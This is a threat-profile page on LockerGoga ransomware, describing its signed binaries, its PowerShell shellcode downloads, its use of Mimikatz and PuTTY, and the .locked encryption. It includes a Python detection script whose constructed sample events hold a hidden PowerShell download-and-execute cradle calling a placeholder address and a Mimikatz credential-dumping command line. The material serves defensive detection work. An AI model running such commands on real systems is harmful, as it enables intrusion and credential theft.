LockerGoga

LockerGoga, also known as GoGalocker, is a ransomware variant first observed in early 2019. It has targeted industrial and manufacturing organizations in addition to a wide range of other sectors. The threat actors digitally sign the ransomware with legitimate code-signing certificates, which helps the binary evade detection; controls that trust a file solely because its signature validates will not stop it. The initial infection vector is unknown; however, once inside, the group uses a number of tools to gain further access to the targeted network. They map out the network and steal credentials that give them access to additional systems and allow them to elevate their privileges. PowerShell commands are used to download and run two pieces of shellcode; the second piece, once executed, allows the malware to communicate with the threat actor. In addition to PowerShell, the threat actors use PuTTY to create SSH sessions, Mimikatz to harvest credentials and escalate privileges, and Wolf-x-full to manage and gather information from a targeted system. Depending on the command-line options used, the ransomware can encrypt all file types or only specific file types such as Word, Excel, PowerPoint, and PDF documents. It appends the .locked extension to each file it encrypts.
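The behaviors described above (PowerShell download-and-execute, PuTTY/Mimikatz tooling, and a burst of files renamed with the .locked extension) can be turned into simple detections. The following script is an added example, not code from the original page or from any of the referenced reports; the Sysmon-like event format, field names, thresholds, hostnames and the sample events are all constructed assumptions for illustration.

```python
"""Toy detections for the LockerGoga behaviours described above.

Added example, not part of the original page. The event format is a
simplified, Sysmon-like dict (assumed) and every sample event is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Heuristics for a PowerShell download/execute cradle (assumed keyword list).
POWERSHELL_DOWNLOAD = re.compile(
    r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|frombase64string)",
    re.IGNORECASE,
)
# Tooling named in the summary above, matched on image path or command line.
SUSPICIOUS_TOOLS = ("mimikatz", "putty", "wolf-x-full")
ENCRYPTED_EXT = ".locked"


def detect_powershell_cradle(event):
    """Flag powershell.exe/pwsh.exe launched with a download/execute cradle."""
    if event["type"] != "process_create":
        return None
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    if POWERSHELL_DOWNLOAD.search(event["cmdline"]):
        return f"{event['host']}: PowerShell download/execute: {event['cmdline']}"
    return None


def detect_known_tools(event):
    """Flag process creations that reference known post-exploitation tooling."""
    if event["type"] != "process_create":
        return None
    haystack = (event["image"] + " " + event["cmdline"]).lower()
    for tool in SUSPICIOUS_TOOLS:
        if tool in haystack:
            return f"{event['host']}: known tooling observed: {tool}"
    return None


def detect_locked_burst(events, threshold=5, window=timedelta(seconds=60)):
    """Alert when one host creates >= threshold '.locked' files inside `window`.

    A single .locked file is not conclusive; a burst on one host is the
    encryption phase. Sliding window over sorted timestamps per host.
    """
    per_host = defaultdict(list)
    for e in events:
        if e["type"] == "file_create" and e["path"].lower().endswith(ENCRYPTED_EXT):
            per_host[e["host"]].append(e["time"])
    alerts = []
    for host, times in per_host.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append(f"{host}: {end - start + 1} .locked files within {window.seconds}s")
                break
    return alerts


def run_detections(events):
    """Run all rules over an event stream and return the alert strings."""
    alerts = []
    for e in events:
        for rule in (detect_powershell_cradle, detect_known_tools):
            hit = rule(e)
            if hit:
                alerts.append(hit)
    alerts.extend(detect_locked_burst(events))
    return alerts


# --- Constructed sample telemetry (not real incident data) -------------------
T0 = datetime(2019, 3, 19, 2, 0, 0)  # arbitrary base timestamp


def proc(host, image, cmdline, sec):
    return {"type": "process_create", "host": host, "image": image,
            "cmdline": cmdline, "time": T0 + timedelta(seconds=sec)}


def fcreate(host, path, sec):
    return {"type": "file_create", "host": host, "path": path,
            "time": T0 + timedelta(seconds=sec)}


SAMPLE_EVENTS = [
    proc("ws1", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
         ".DownloadString('http://203.0.113.10/s1')\"", 0),          # cradle (alert)
    proc("ws1", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe Get-Process", 5),                            # benign, no alert
    proc("ws1", r"C:\Users\a\AppData\Local\Temp\putty.exe",
         "putty.exe -ssh 10.0.0.5", 30),                              # tooling (alert)
    proc("dc1", r"C:\Users\a\AppData\Local\Temp\mimikatz.exe",
         "mimikatz.exe privilege::debug sekurlsa::logonpasswords", 60),  # tooling (alert)
    *[fcreate("ws2", rf"C:\Users\a\Documents\q{i}.docx.locked", 100 + 5 * i)
      for i in range(6)],                                             # burst (alert)
    fcreate("ws3", r"C:\Users\b\Desktop\notes.txt.locked", 120),      # single file, no alert
    fcreate("ws2", r"C:\Users\a\Documents\report.docx", 130),         # not .locked
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

The burst rule is the one worth tuning: the threshold and window are placeholders, and in production the file-create source would be Sysmon Event ID 11 or an EDR equivalent rather than an in-memory list. The cradle keywords catch the obvious cases only; encoded (-EncodedCommand) payloads need decoding before matching.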

Technical Details and Reporting

  • Bleeping Computer provides details of this ransomware variant here.

  • CIS also provides a Security Primer here.

  • UPDATE 04/09/2019: Securonix Threat Research Team provides a summary, recommendations, predictive indicators, and security analytics.

  • UPDATE 7/23/2019: Symantec reports on LockerGoga capabilities and activities in their report “Targeted Ransomware: Proliferating Menace Threatens Organizations.”

[Image: LockerGoga ransom note]